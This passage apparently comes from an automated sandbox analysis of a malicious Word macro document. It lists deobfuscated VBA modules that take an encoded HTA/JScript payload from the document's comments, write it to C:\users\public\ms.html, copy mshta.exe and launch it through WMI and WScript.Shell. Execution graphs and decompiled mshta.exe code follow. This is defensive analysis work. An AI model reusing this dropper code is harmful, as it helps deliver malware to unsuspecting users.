gkMwqbX3SzA2tcpJL3nPykMwqbB3SzA2uypJL3nT5kMwqbL3SzA2t0pJL3nPOkMwqbCKSzA2ttpJL3nTgkMwqbMKSzA2u5pJL3nUAkMwqbqUSzA2ulpJL3nP5kMwqbnKSzA2uhpJL3nTEkMwq) -> 17902

                                                                                                                                                                                            executed
                                                                                                                                                                                            11

                                                                                                                                                                                            aJjwu = 0

                                                                                                                                                                                            15

                                                                                                                                                                                            aMnjk = Mid(a2cCM, as6h1W, 1)

                                                                                                                                                                                            Mid

                                                                                                                                                                                            16

                                                                                                                                                                                            aDKIk = Asc(aMnjk)

                                                                                                                                                                                            Asc

                                                                                                                                                                                            21

                                                                                                                                                                                            If (aDKIk > 64 And aDKIk < 91) Or (aDKIk > 96 And aDKIk < 123) Then

                                                                                                                                                                                            22

                                                                                                                                                                                            aJjwu = as8nLc

                                                                                                                                                                                            as8nLc

                                                                                                                                                                                            23

                                                                                                                                                                                            aDKIk = aYzBn(aDKIk, aJjwu)

                                                                                                                                                                                            28

                                                                                                                                                                                            If aDKIk < a3eJx(5) And aDKIk > 83 Then

                                                                                                                                                                                            29

                                                                                                                                                                                            aDKIk = a3ox6(aDKIk)

                                                                                                                                                                                            30

                                                                                                                                                                                            Elseif aDKIk < 128 - 63 Then

                                                                                                                                                                                            31

                                                                                                                                                                                            aDKIk = a3ox6(aDKIk)

                                                                                                                                                                                            32

                                                                                                                                                                                            Endif

                                                                                                                                                                                            33

                                                                                                                                                                                            Endif

                                                                                                                                                                                            34

                                                                                                                                                                                            anFJy = a9vceZ(aDKIk)

                                                                                                                                                                                            35

                                                                                                                                                                                            MidDollar (a2cCM, as6h1W, 1) = adBRr(anFJy)

                                                                                                                                                                                            36

                                                                                                                                                                                            Next

                                                                                                                                                                                            Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) | (rap2 >> 4); pue2 = ((rap2 & 15) << 4) | (rap3 >> 2); pue3 = ((rap3 & 3) << 6) | rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "qaSzA2uupJL3nUWkMwqbVUSzA2uupJL3nQIkMwqbDKSzA2uipJL3nTMkMwqbVUSzA2t9pJL3nPOkMwqbYKSzA2t0pJL3nQAkMwqbA3SzA2tmpJL3nQIkMwqbB3SzA2uzpJL3nUIkMwqboaSzA2uwpJL3nUEkMwqbnKSzA2uipJL3nT5kMwqbVUSzA2uxpJL3nTIkMwqbL3SzA2uipJL3nTEkMwqbMKSzA2tbpJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2tcpJL3nUgkMwqbqaSzA2uupJL3nUWkMwqbVUSzA2uepJL3nTIkMwqbrKSzA2umpJL3nUEkMwqbpaSzA2ttpJL3nQ1kMwqbVUSzA2tvpJL3nRSkMwqbDaSzA2uQpJL3nREkMwqbEKSzA2uTpJL3nRqkMwqbFUSzA2uWpJL3nRckMwqbF3SzA2uZpJL3nR1kMwqbGaSzA2uCpJL3nSOkMwqbHKSzA2uFpJL3nSAkMwqbIUSzA2uIpJL3nSMkMwqbI3SzA2uLpJL3nSykMwqbJaSzA2uupJL3nTWkMwqbL3SzA2uxpJL3nTIkMwqbMaSzA2uapJL3nTukMwqbnKSzA2udpJL3nTgkMwqboUSzA2ugpJL3nT5kMwqbo3SzA2ujpJL3nUSkMwqbpaSzA2umpJL3nUEkMwqbqKSzA2u2pJL3nUqkMwqbrUSzA2u5pJL3nUckMwqbZUSzA2tkpJL3nQWkMwqbZ3SzA2t0pJL3nQIkMwqbAaSzA2t3pJL3nQukMwqbBKSzA2tepJL3nP9kMwqbCKSzA2tvpJL3nQgkMwqbqaSzA2uupJL3nUWkMwqbVUSzA2uipJL3nUIkMwqbqUSzA2ujpJL3nUIkMwqbqUSzA2ttpJL3nQ1kMwqbVUSzA2tvpJL3nPWkMwqbB3SzA2u2pJL3nTSkMwqbpaSzA2ttpJL3nTAkMwqbnUSzA2ulpJL3nQSkMwqbYUSzA2ttpJL3nTAkMwqbnUSzA2ulpJL3nQWkMwqbYUSzA2ttpJL3nTAkMwqbnUSzA2ulpJL3nQAkMwqbB3SzA2u2pJL3nTSkMwqbpaSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQSkMwqbYUSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQWkMwqbYUSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQAkMwqbYUSzA2ttpJL3nTIkMwqboaSzA2uwpJL3nQEkMwqbB3SzA2u2pJL3nTSkMwqbpaSzA2ttpJL3nTykMwqbVUSzA2t9pJL3nPOkMwqbZUSzA2t7pJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2ttpJL3nQ1kMwqbVUSzA2ucpJL3nT5kMwqbpUSzA2u1pJL3nUEkMwqbYaSzA2ulpJL3nTIkMwqbpUSzA2ufpJL3nTSkMwqbL3SzA2uypJL3nPukMwqbY3SzA2uopJL3nS5kMwqbDKSzA2tgpJL3nSckMwqbLKSzA2tgpJL3nUckMwqbZUSzA2tgpJL3nQykMwqbKUSzA2tepJL3nSkkMwqbY3SzA2uppJL3nQ1kMwqbKKSzA2tipJL3nTqkMwqbYUSzA2ttpJL3nPWkMwqbVaSzA2tcpJL3nQgkMwqbq3SzA2ubpJL3nTykMwqboUSzA2uypJL3nPOkMwqbXUSzA2ucpJL3nPOkMwqbCUSzA2ttpJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2thpJL3nTkkMwqbMKSzA2uhpJL3nTqkMwqbqUSzA2ubpJL3nPykMwqbr3SzA2uypJL3nT5kMwqbL3SzA2tkpJL3nPOkMwqbCKSzA2ttpJL3nTgkMwqbMKSzA2u5pJL3nUAkMwqbqUSzA2ulpJL3nP5kMwqbnKSzA2uhpJL3nTEkMwqbMKSzA2u4pJL3nR9kMwqbMaSzA2tbpJL3nTykMwqboaSzA2ujpJL3nUIkMwqbqUSzA2thpJL3nTAkMwqbnUSzA2uupJL3nUWkMwqbDKSzA2u0pJL3nPukMwqbnKSzA2tepJL3nPgkMwqbXKSzA2tcpJL3nQgkMwqbMKSzA2uhpJL3nTAkMwqbZaSzA2ttpJL3nQ1kMwqbVUSzA2uepJL3nTIkMwqbrKSzA2umpJL3nUEkMwqbpaSzA2thpJL3nTykMwqboaSzA2uxpJL3nTIkMwqbrUSzA2uCpJL3nTMkMwqbXUSzA2ucpJL3nT5kMwqbpUSzA2u1pJL3nUEkMwqbYaSzA2uwpJL3nTukMwqbLKSzA2ulpJL3nRSkMwqbqUSzA2tbpJL3nTykMwqbX3SzA2tepJL3nPykMwqbXKSzA2t7pJL3nTIkMwqboaSzA2uwpJL3nQAkMwqbVUSzA2t9pJL3nPOkMwqbn3SzA2uypJL3nUykMwqbp3SzA2u0pJL3nUWkMwqbYaSzA2ucpJL3nT5kMwqbMUSzA2uypJL3nUukMwqbG3SzA2uzpJL3nPukMwqbnKSzA2uhpJL3nUOkMwqbqKSzA2u0pJL3nP5kMwqbL3SzA2ubpJL3nTSkMwqbpaSzA2uOpJL3nUEkMwqbXUSzA2ucpJL3nPgkMwqbX3SzA2tcpJL3nPykMwqbB3SzA2uypJL3nT5kMwqbL3SzA2t0pJL3nPOkMwqbCKSzA2ttpJL3nTgkMwqbMKSzA2u5pJL3nUAkMwqbqUSzA2ulpJL3nP5kMwqbnKSzA2uhpJL3nTEkMwq) -> 17902

                                                                                                                                                                                            executed
                                                                                                                                                                                            41

                                                                                                                                                                                            a6sXJE = a2cCM

                                                                                                                                                                                            42

                                                                                                                                                                                            End Function

                                                                                                                                                                                            Module: aRZcbw

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "aRZcbw"

                                                                                                                                                                                            2

                                                                                                                                                                                            Public Const a3IdJQ as String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"

                                                                                                                                                                                            3

                                                                                                                                                                                            Public Const a7odJ as String = ")"

                                                                                                                                                                                            4

                                                                                                                                                                                            Public Const as8nLc as Integer = 30602 / 2354

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            BuiltInDocumentProperties

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            33

                                                                                                                                                                                            Function a8qpd(afAV8)

                                                                                                                                                                                            42

                                                                                                                                                                                            a8qpd = ActiveDocument.BuiltInDocumentProperties(afAV8)

                                                                                                                                                                                            BuiltInDocumentProperties

                                                                                                                                                                                            executed
                                                                                                                                                                                            43

                                                                                                                                                                                            End Function

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            44

                                                                                                                                                                                            Public Sub aYKyQ()

                                                                                                                                                                                            48

                                                                                                                                                                                            If - 342 + 406 < 164 Then

                                                                                                                                                                                            executed
                                                                                                                                                                                            49

                                                                                                                                                                                            Call aVzRp()

                                                                                                                                                                                            50

                                                                                                                                                                                            Endif

                                                                                                                                                                                            51

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            52

                                                                                                                                                                                            Public Sub axIuO()

                                                                                                                                                                                            53

                                                                                                                                                                                            If - 342 + 406 < 164 Then

                                                                                                                                                                                            executed
                                                                                                                                                                                            54

                                                                                                                                                                                            Call ah28l()

                                                                                                                                                                                            55

                                                                                                                                                                                            Endif

                                                                                                                                                                                            56

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            Non-Executed Functions
                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            5

                                                                                                                                                                                            Function aG87E()

                                                                                                                                                                                            10

                                                                                                                                                                                            End Function

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            11

                                                                                                                                                                                            Sub a7zcHr(aFtIw)

                                                                                                                                                                                            32

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            Module: abh0Rg

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "abh0Rg"

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            FreeFile

                                                                                                                                                                                            Open

                                                                                                                                                                                            Open("C:\users\public\ms.html")
                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            2

                                                                                                                                                                                            Public Function aX4od(aVOhvn, aA5aKj)

                                                                                                                                                                                            26

                                                                                                                                                                                            FileNumber = FreeFile

                                                                                                                                                                                            FreeFile

                                                                                                                                                                                            executed
                                                                                                                                                                                            27

                                                                                                                                                                                            Open aVOhvn For Output As # FileNumber

                                                                                                                                                                                            Open("C:\users\public\ms.html")

                                                                                                                                                                                            executed
                                                                                                                                                                                            32

                                                                                                                                                                                            Print # FileNumber, aA5aKj

                                                                                                                                                                                            37

                                                                                                                                                                                            Close # FileNumber

                                                                                                                                                                                            38

                                                                                                                                                                                            End Function

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            FileCopy

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            39

                                                                                                                                                                                            Sub amZcqK(aH6Oa, aicyF)

                                                                                                                                                                                            50

                                                                                                                                                                                            FileCopy aH6Oa, aicyF

                                                                                                                                                                                            FileCopy

                                                                                                                                                                                            executed
                                                                                                                                                                                            51

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            52

                                                                                                                                                                                            Function adBRr(avhZYf)

                                                                                                                                                                                            53

                                                                                                                                                                                            adBRr = avhZYf

                                                                                                                                                                                            executed
                                                                                                                                                                                            54

                                                                                                                                                                                            End Function

                                                                                                                                                                                            Module: adGbPA

                                                                                                                                                                                            Declaration
                                                                                                                                                                                            LineContent
                                                                                                                                                                                            1

                                                                                                                                                                                            Attribute VB_Name = "adGbPA"

                                                                                                                                                                                            Executed Functions
                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function aX4od@abh0Rg: FreeFile

                                                                                                                                                                                            Part of subcall function aX4od@abh0Rg: Open

                                                                                                                                                                                            Part of subcall function a6sXJE@aOMv0: Len

                                                                                                                                                                                            Part of subcall function a6sXJE@aOMv0: Mid

                                                                                                                                                                                            Part of subcall function a6sXJE@aOMv0: Asc

                                                                                                                                                                                            Part of subcall function a6sXJE@aOMv0: as8nLc

                                                                                                                                                                                            Part of subcall function a8qpd@aRZcbw: BuiltInDocumentProperties

                                                                                                                                                                                            StringsDecrypted Strings
                                                                                                                                                                                            "comments"
                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            54

                                                                                                                                                                                            Sub ah28l()

                                                                                                                                                                                            55

                                                                                                                                                                                            aocn4g = ayUxA2(adkJvD(2))

                                                                                                                                                                                            executed
                                                                                                                                                                                            56

                                                                                                                                                                                            aX4od aocn4g, a6sXJE(a8qpd("comments"))

                                                                                                                                                                                            57

                                                                                                                                                                                            End Sub

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Split

                                                                                                                                                                                            Part of subcall function aSGxU@a7A5m: Len

                                                                                                                                                                                            Part of subcall function aSGxU@a7A5m: Mid

                                                                                                                                                                                            StringsDecrypted Strings
                                                                                                                                                                                            "l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"
                                                                                                                                                                                            "|"
                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            2

                                                                                                                                                                                            Function aGSfMv()

                                                                                                                                                                                            3

                                                                                                                                                                                            aGSfMv = VBA.Split(aSGxU("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")

                                                                                                                                                                                            Split

                                                                                                                                                                                            executed
                                                                                                                                                                                            4

                                                                                                                                                                                            End Function

                                                                                                                                                                                            APIsMeta Information

                                                                                                                                                                                            Part of subcall function aGSfMv@adGbPA: Split

                                                                                                                                                                                            LineInstructionMeta Information
                                                                                                                                                                                            5

                                                                                                                                                                                            Function adkJvD(ah7ovz)

                                                                                                                                                                                            10

                                                                                                                                                                                            apa2Q = aGSfMv()

                                                                                                                                                                                            executed
                                                                                                                                                                                            30

                                                                                                                                                                                            Select Case ah7ovz

                                                                                                                                                                                            35

                                                                                                                                                                                            Case 0

                                                                                                                                                                                            40

                                                                                                                                                                                            adkJvD = apa2Q(1)

                                                                                                                                                                                            45

                                                                                                                                                                                            Case 1

                                                                                                                                                                                            46

                                                                                                                                                                                            adkJvD = apa2Q(2)

                                                                                                                                                                                            50

                                                                                                                                                                                            Case 2

                                                                                                                                                                                            51

                                                                                                                                                                                            adkJvD = apa2Q(3)

                                                                                                                                                                                            52

                                                                                                                                                                                            End Select

                                                                                                                                                                                            53

                                                                                                                                                                                            End Function

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:39%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:47%
                                                                                                                                                                                              Total number of Nodes:100
                                                                                                                                                                                              Total number of Limit Nodes:5

                                                                                                                                                                                              Graph

                                                                                                                                                                                              execution_graph 353 b31ab3 354 b31ac7 _exit 353->354 355 b31ace 353->355 354->355 356 b31ae2 355->356 357 b31ad7 _cexit 355->357 358 b31ec4 4 API calls 356->358 357->356 359 b31aee 358->359 266 b31910 287 b31dc3 266->287 268 b31915 269 b31926 GetStartupInfoW 268->269 270 b31943 269->270 271 b31958 270->271 272 b3195f Sleep 270->272 273 b31981 271->273 274 b31977 _amsg_exit 271->274 272->270 275 b3199e 273->275 292 b31aef 273->292 274->275 276 b319c3 _initterm 275->276 278 b319a4 275->278 283 b319de __IsNonwritableInCurrentImage 275->283 276->283 340 b31ec4 278->340 281 b31a86 _ismbblead 281->283 282 b31ace 282->278 284 b31ad7 _cexit 282->284 283->281 283->282 286 b31a6e exit 283->286 296 b31460 #650 283->296 284->278 286->283 288 b31de8 287->288 289 b31dec GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 287->289 288->289 290 b31e50 288->290 291 b31e3b 289->291 290->268 291->290 293 b31b0a 292->293 343 b31b40 293->343 295 b31b33 295->275 297 b31488 296->297 298 b3148d SetProcessDEPPolicy 296->298 297->298 300 b31495 297->300 298->300 299 b314f0 GetVersion 301 b3153b 299->301 302 b314fa 299->302 300->299 304 b314b7 rand_s 300->304 349 b317d0 301->349 302->301 305 b314fe GetModuleHandleW 302->305 304->299 307 b314c9 304->307 305->301 308 b3150d GetProcAddress 305->308 307->299 310 b314d7 VirtualAlloc 307->310 308->301 317 b3151f 308->317 309 b317d0 2 API calls 311 b31555 309->311 310->299 310->310 312 b31765 311->312 313 b3156d LoadLibraryW 311->313 314 b31781 RegCloseKey 312->314 315 b3178a 312->315 313->312 316 b31583 GetProcAddress 313->316 314->315 315->283 318 b315e1 FreeLibrary 316->318 324 b31596 316->324 317->301 318->312 319 b315f4 RegOpenKeyExA 318->319 319->312 320 b31615 RegQueryValueExA 319->320 320->312 321 b31631 320->321 322 b3164e LoadLibraryA 321->322 323 b31639 ExpandEnvironmentStringsA 321->323 326 b31669 322->326 323->312 323->322 324->318 327 b3167b RegCloseKey 326->327 328 b31688 GetModuleHandleW 326->328 327->328 329 b3169b GetProcAddress 328->329 337 b3170d 328->337 331 b316ae 329->331 329->337 330 b31724 GetProcAddress 332 b3175e FreeLibrary 330->332 336 b31737 330->336 333 b317d0 2 API calls 331->333 332->312 334 b316d7 333->334 335 b316df MultiByteToWideChar 334->335 334->337 335->337 338 b316f6 RegisterApplicationRestart 335->338 336->332 337->312 337->330 338->337 341 b31b40 4 API calls 340->341 342 b31aee 341->342 344 b31b48 343->344 345 b31b4b 343->345 344->295 348 b31f11 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 345->348 347 b32047 347->295 348->347 350 b317e5 malloc 349->350 351 b3154d 350->351 352 b317d8 _callnewh 350->352 351->309 352->350 352->351 360 b31b70 361 b31bad 360->361 363 b31b82 360->363 362 b31ba7 ?terminate@ 362->361 363->361 363->362 364 b31ee0 _except_handler4_common 365 b317a0 GetVersionExA 366 b31800 368 b3180e 366->368 375 b31c3e GetModuleHandleW 368->375 369 b3186c __set_app_type __p__fmode __p__commode 370 b318a4 369->370 371 b318b9 370->371 372 b318ad __setusermatherr 370->372 377 b31e63 _controlfp 371->377 372->371 374 b318be 376 b31c4f 375->376 376->369 377->374 378 b31a9f _XcptFilter

                                                                                                                                                                                              Callgraph

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 0 b31460-b31486 #650 1 b31488-b3148b 0->1 2 b3148d-b3148f SetProcessDEPPolicy 0->2 1->2 3 b31495-b314a3 call b317bb 1->3 2->3 6 b314f0-b314f8 GetVersion 3->6 7 b314a5-b314ac 3->7 9 b3153b-b3155f call b317d0 * 2 6->9 10 b314fa-b314fc 6->10 7->6 8 b314ae-b314b5 7->8 8->6 12 b314b7-b314c7 rand_s 8->12 22 b31770-b31772 9->22 23 b31565-b31567 9->23 10->9 13 b314fe-b3150b GetModuleHandleW 10->13 12->6 15 b314c9-b314d5 12->15 13->9 16 b3150d-b3151d GetProcAddress 13->16 15->6 18 b314d7-b314ee VirtualAlloc 15->18 16->9 19 b3151f-b31532 16->19 18->6 18->18 19->9 35 b31534-b31539 19->35 24 b31774-b3177a call b317f9 22->24 25 b3177b-b3177f 22->25 26 b31765-b31767 23->26 27 b3156d-b3157d LoadLibraryW 23->27 24->25 30 b31781-b31784 RegCloseKey 25->30 31 b3178a-b31792 25->31 26->22 33 b31769-b3176f call b317f9 26->33 27->26 32 b31583-b31594 GetProcAddress 27->32 30->31 36 b315e1-b315ee FreeLibrary 32->36 37 b31596-b315ba 32->37 33->22 35->9 36->26 39 b315f4-b3160f RegOpenKeyExA 36->39 44 b315bd-b315bf 37->44 39->26 41 b31615-b3162b RegQueryValueExA 39->41 41->26 43 b31631-b31637 41->43 45 b31655 43->45 46 b31639-b31648 ExpandEnvironmentStringsA 43->46 47 b315c1-b315c6 44->47 48 b315c8-b315ca 44->48 50 b31657-b31679 LoadLibraryA call b317f9 * 2 45->50 46->26 49 b3164e-b31653 46->49 47->48 48->36 51 b315cc-b315de 48->51 49->45 49->50 56 b3167b-b31684 RegCloseKey 50->56 57 b31688-b31695 GetModuleHandleW 50->57 51->36 56->57 58 b31720-b31722 57->58 59 b3169b-b316ac GetProcAddress 57->59 58->25 60 b31724-b31735 GetProcAddress 58->60 59->58 61 b316ae-b316b1 59->61 62 b31737-b3174d 60->62 63 b3175e-b3175f FreeLibrary 60->63 64 b316b4-b316b9 61->64 69 b31750-b31752 62->69 63->26 64->64 65 b316bb-b316dd call b317d0 64->65 65->58 70 b316df-b316f4 MultiByteToWideChar 65->70 71 b31754-b31759 69->71 72 b3175b 69->72 73 b31717-b3171f call b317f9 70->73 74 b316f6-b3170b RegisterApplicationRestart 70->74 71->72 72->63 73->58 78 b31714 74->78 79 b3170d-b31712 74->79 78->73 79->78
                                                                                                                                                                                              C-Code - Quality: 55%
                                                                                                                                                                                              			E00B31460(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                                                                                                                                              				signed int _v5;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				int _v20;
                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                              				struct HINSTANCE__* _v28;
                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                              				int _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                              				char _v52;
                                                                                                                                                                                              				struct HINSTANCE__** _t67;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				long _t70;
                                                                                                                                                                                              				CHAR* _t72;
                                                                                                                                                                                              				struct HINSTANCE__* _t75;
                                                                                                                                                                                              				_Unknown_base(*)()* _t76;
                                                                                                                                                                                              				long _t79;
                                                                                                                                                                                              				long _t82;
                                                                                                                                                                                              				CHAR* _t83;
                                                                                                                                                                                              				struct HINSTANCE__* _t84;
                                                                                                                                                                                              				struct HINSTANCE__* _t85;
                                                                                                                                                                                              				_Unknown_base(*)()* _t86;
                                                                                                                                                                                              				_Unknown_base(*)()* _t90;
                                                                                                                                                                                              				intOrPtr _t91;
                                                                                                                                                                                              				short* _t94;
                                                                                                                                                                                              				void* _t101;
                                                                                                                                                                                              				struct HINSTANCE__* _t106;
                                                                                                                                                                                              				struct HINSTANCE__** _t110;
                                                                                                                                                                                              				void* _t112;
                                                                                                                                                                                              				CHAR* _t116;
                                                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				CHAR* _t148;
                                                                                                                                                                                              				intOrPtr* _t149;
                                                                                                                                                                                              				struct HINSTANCE__* _t152;
                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                              				void* _t158;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t67 =  &_v28;
                                                                                                                                                                                              				__imp__#650( *0xb31008, 0, 1, _t67, 4, 0, 0); // executed
                                                                                                                                                                                              				if(_t67 < 0 || _v28 == 0) {
                                                                                                                                                                                              					__imp__SetProcessDEPPolicy(1); // executed
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00B317BB(_t67);
                                                                                                                                                                                              				_t69 = 2;
                                                                                                                                                                                              				if( *0xb33370 != _t69 ||  *0xb33364 != 6 ||  *0xb33368 != 1) {
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					_t70 = GetVersion();
                                                                                                                                                                                              					if(_t70 >= 0 && _t70 >= 6) {
                                                                                                                                                                                              						_t106 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                              						if(_t106 != 0) {
                                                                                                                                                                                              							_t149 = GetProcAddress(_t106, "HeapSetInformation");
                                                                                                                                                                                              							if(_t149 != 0) {
                                                                                                                                                                                              								 *0xb340cc(0, 1, 0, 0);
                                                                                                                                                                                              								 *_t149();
                                                                                                                                                                                              								if(_t158 != _t158) {
                                                                                                                                                                                              									asm("int 0x29");
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v12 = _v12 | 0xffffffff;
                                                                                                                                                                                              					_v32 = 0x105;
                                                                                                                                                                                              					_t148 = E00B317D0(0x105);
                                                                                                                                                                                              					_t72 = E00B317D0(0x105);
                                                                                                                                                                                              					_v5 = 1;
                                                                                                                                                                                              					_t116 = _t72;
                                                                                                                                                                                              					if(_t148 == 0) {
                                                                                                                                                                                              						L50:
                                                                                                                                                                                              						if(_t116 != 0) {
                                                                                                                                                                                              							_push(_t116);
                                                                                                                                                                                              							L00B317F9();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L52:
                                                                                                                                                                                              						if(_v12 != 0xffffffff) {
                                                                                                                                                                                              							RegCloseKey(_v12);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t116 == 0) {
                                                                                                                                                                                              						L48:
                                                                                                                                                                                              						if(_t148 != 0) {
                                                                                                                                                                                              							_push(_t148);
                                                                                                                                                                                              							L00B317F9();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L50;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t75 = LoadLibraryW(L"WLDP.DLL"); // executed
                                                                                                                                                                                              					_v16 = _t75;
                                                                                                                                                                                              					if(_t75 == 0) {
                                                                                                                                                                                              						goto L48;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t76 = GetProcAddress(_t75, "WldpGetLockdownPolicy");
                                                                                                                                                                                              					_v28 = _t76;
                                                                                                                                                                                              					if(_t76 != 0) {
                                                                                                                                                                                              						_v52 = 1;
                                                                                                                                                                                              						_v48 = 1;
                                                                                                                                                                                              						_v44 = 0;
                                                                                                                                                                                              						_v40 = 0;
                                                                                                                                                                                              						 *0xb340cc( &_v52,  &_v24, 0); // executed
                                                                                                                                                                                              						_t101 = _v28();
                                                                                                                                                                                              						if(_t158 != _t158) {
                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t101 >= 0) {
                                                                                                                                                                                              							_v5 = _v5 & (_v24 & 0x80000000 | (_v24 & 0x8000001c) != 0x80000004) - 0x00000001;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					FreeLibrary(_v16); // executed
                                                                                                                                                                                              					if(_v5 != 0) {
                                                                                                                                                                                              						goto L48;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t79 = RegOpenKeyExA(0x80000000, "clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", 0, 1,  &_v12); // executed
                                                                                                                                                                                              						if(_t79 != 0) {
                                                                                                                                                                                              							goto L48;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t82 = RegQueryValueExA(_v12, 0, 0,  &_v20, _t148,  &_v32); // executed
                                                                                                                                                                                              						if(_t82 != 0) {
                                                                                                                                                                                              							goto L48;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_push(2);
                                                                                                                                                                                              						if(_v20 != 0) {
                                                                                                                                                                                              							L29:
                                                                                                                                                                                              							_t83 = _t148;
                                                                                                                                                                                              							L30:
